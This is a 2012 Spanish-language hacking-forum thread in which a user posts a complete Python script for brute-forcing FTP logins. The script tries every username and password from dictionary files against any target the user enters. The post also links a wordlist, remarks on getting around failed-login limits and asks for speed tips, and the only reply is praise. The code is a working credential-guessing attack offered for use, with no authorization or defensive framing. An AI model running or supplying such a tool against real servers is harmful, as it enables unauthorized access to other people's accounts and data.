elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  BruteForce Ftp Python
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: BruteForce Ftp Python  (Leído 2,672 veces)
Runex

Desconectado Desconectado

Mensajes: 192


http://tutogramacion.blogspot.com


Ver Perfil WWW
BruteForce Ftp Python
« en: 17 Mayo 2012, 00:49 am »

Buenas compañeros, estaba haciendo un bruteforce ftp con python, pero tengo un par de problemas, uno de los cuales es la velocidad y otro el límite establecido de logueos fallidos. ¿ Alguna Idea ?

EDIT: Por lo visto el problema de la velocidad solo se da en algunos servers, en servidores que no tienen límite de intentos fallidos, funciona perfectamente :).
Resuelto el problema de los límites de fallos :)

Aquí os dejo el link con un diccionario de 3mb en texto plano ( hay bastantes :D), utilizad el mismo diccionario para los usuarios y los passwords, solo tenéis que hacer una copia y renombrarla a passwords.txt: https://rapidshare.com/files/4215115057/usuarios.txt

Tened en cuenta también que en los ftp públicos toda cuenta que tenga como user "anonymous" es válida xD.

Si os interesa que le aplique interfaz gráfica decidmelo :).

Este es el código:

Código
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. import ftplib
  4.  
  5. class ftp_brute_force:
  6. def __init__(self,conectftp,target):
  7. self.listausuarios,self.listapasswords,self.conectftp,self.target,self.contadorus,self.contadorpas = ([],[],conectftp,target,0,0)
  8. print "\n[+] Cargando los diccionarios,esto puede tardar unos segundos... [+]"
  9. try:
  10. self.users = open("usuarios.txt","r")
  11. self.passwords = open("passwords.txt","r")
  12. except:
  13. print "\n [-] No existen los diccionarios"
  14. exit()
  15. for self.user in self.users.readlines():
  16. self.listausuarios.append(self.user)
  17. self.contadorus += 1
  18. for self.password in self.passwords.readlines():
  19. self.listapasswords.append(self.password)
  20. self.contadorpas += 1
  21. self.users.close()
  22. self.passwords.close()
  23. print "\n[+] Diccionarios Cargados: " + str(self.contadorus) + " Usuarios y " + str(self.contadorpas) + " Passwords [+]"
  24. print "\n[+] Combinaciones posibles: " + str(self.contadorus*self.contadorpas) +" [+]"
  25. print "\n[+] Ataque iniciado,puede llevar bastante tiempo, no cierre el programa [+]\n\n"
  26. self.bruteforce()
  27. def bruteforce(self):
  28. for self.user in self.listausuarios:
  29. for self.password in self.listapasswords:
  30. try:
  31. self.conectftp.login(self.user,self.password)
  32. print "Los datos son --> " + self.user + " y " + self.password
  33. self.conectftp.quit()
  34. self.conectftp.close()
  35. self.conectftp = ftplib.FTP(self.target)
  36. raw_input()
  37. except:
  38. print self.user + " y " + self.password + " no son correctos"
  39. self.conectftp.quit()
  40. self.conectftp.close()
  41. self.conectftp = ftplib.FTP(self.target)
  42.  
  43. print " [-] No se han podido extraer datos."
  44.  
  45. if __name__ == '__main__':
  46. print " [+]   FTP CRACKER BY RUNE   [+]\n\n\n"
  47. target = raw_input("\n\nIntroduce el target [+] > ")
  48. try:
  49. conectftp = ftplib.FTP(target)
  50. except:
  51. print " \n[-] No existe el target"
  52. exit()
  53. instancia = ftp_brute_force(conectftp,target)
  54.  
  55.  
  56.  

Por cierto, para amenizar la impresión por pantalla quería hacer tipo un contador que vaya subiendo por cada usuario y contraseña probado, sin que cambie de posición en pantalla, que se vaya actualizando, algo así:

0/10000 y que cuando pruebe 1 cambie a 1/10000 sin imprimirse en otra linea.

¿ Se os ocurre algo ?

Eso es todo compañeros, espero vuestra ayuda, un saludo, Runex :)


« Última modificación: 18 Mayo 2012, 01:37 am por Runex » En línea

"No renunciaría al bambú.
Nunca renuciaría a ti.
No te compares con otros" "El me dijo:
El bambú tenía un propósito diferente al del
helecho, sin embargo eran necesarios y
hacían del bosque un lugar hermoso".
0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: BruteForce Ftp Python
« Respuesta #1 en: 17 Mayo 2012, 19:32 pm »

Muy bueno, Runex! ;-)


En línea

I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿BruteForce de Ips?
Foro Libre
Marovingio 2 2,524 Último mensaje 10 Septiembre 2010, 22:58 pm
por Marovingio
duda bruteforce wpa
Wireless en Linux
angelsilva 3 2,632 Último mensaje 2 Abril 2011, 02:48 am
por pianista
Quiero link de hydra Bruteforce
Software
spider1 1 1,661 Último mensaje 18 Octubre 2012, 05:00 am
por Eleкtro
[Código-Python]Bruteforce logins - JaAViEr (0000x5d)
Scripting
0x5d 0 1,735 Último mensaje 20 Marzo 2013, 21:31 pm
por 0x5d
[PYTHON] Bruteforce a mi propio script de login en python.
Scripting
dimineko 0 1,813 Último mensaje 21 Julio 2019, 18:43 pm
por dimineko
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines